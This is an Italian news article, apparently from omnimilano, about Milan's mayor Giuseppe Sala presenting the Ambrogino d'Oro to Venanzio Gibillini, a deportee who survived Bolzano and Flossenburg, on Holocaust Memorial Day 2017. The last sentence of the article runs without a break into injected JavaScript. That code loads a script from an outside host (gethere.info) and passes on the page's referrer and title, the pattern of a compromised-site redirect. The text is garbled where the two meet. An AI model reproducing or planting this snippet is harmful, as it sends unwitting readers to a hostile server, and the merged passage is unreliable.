"/>
lunedì 20 novembre 2017 05:00:54
omnimilano

GIORNO MEMORIA, SALA CONSEGNA AMBROGINO D’ORO A VENANZIO GIBILLINI

26 gennaio 2017 Senza categoria

“Milano e’ grata a Venanzio Gibillini per il suo luminoso esempio di coraggio e per la sua testimonianza dei valori ambrosiani della liberta’, antifascismo e difesa della democrazia”. Questa la motivazione con cui il sindaco Giuseppe Sala ha consegnato in consiglio comunale l’Ambrogino d’Oro a Venanzio Gibillini, sopravvissuto ai campi di concentramento di Bolzano e Flossenburg. “Milano dice il suo grazie per la sua opera instancabile di testimone, per aver incontrato in tanti anni migliaia di ragazzi”, ha detto Sala, nel momento in aula consiliare organizzato nell’ambito delle celebrazioni del Giorno della Memoria. Milanese, “ha vissuto fino in fondo la sua adesione ai valori di liberta’ e democrazia”, ha ricordato il sindaco: una “coscienza limpida, che dopo l’8 settembre rifiuto’ l’arruolamento per la Repubblica sociale” e per questo fu rinchiuso a San Vittore e poi deportato nei due campi di concentramento e liberato il 25 aprile del ’45.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo